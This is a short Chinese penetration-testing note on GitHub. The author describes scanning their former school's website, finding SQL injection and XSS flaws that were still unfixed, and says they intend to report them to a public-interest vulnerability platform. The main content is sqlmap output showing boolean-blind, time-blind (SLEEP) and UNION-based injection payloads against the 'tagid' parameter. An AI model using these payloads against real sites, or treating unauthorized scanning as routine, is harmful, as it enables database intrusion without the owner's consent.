Skip to content

Latest commit

 

History

History
40 lines (27 loc) · 1.21 KB

渗透实战.md

File metadata and controls

40 lines (27 loc) · 1.21 KB

渗透简单的记录笔记

信息收集

基于对母校的热爱,awvs一波扫描,发现几个月前的sql注入,xss漏洞依旧存在,决定搞一波操作,然后提交公益src

漏洞验证

使用burp插件直接调用sqlmap

web application technology: Nginx, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12

---
Parameter: tagid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tagid=3 AND 6952=6952

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: tagid=3 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: tagid=3 UNION ALL SELECT CONCAT(0x7176707071,0x4a6c5946456a6f484f77736949536d63616b6b7957565659764f68674345666b4666727444676658,0x716a716a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nwZq
---

点到为止,所以对网站的xss漏洞进行测试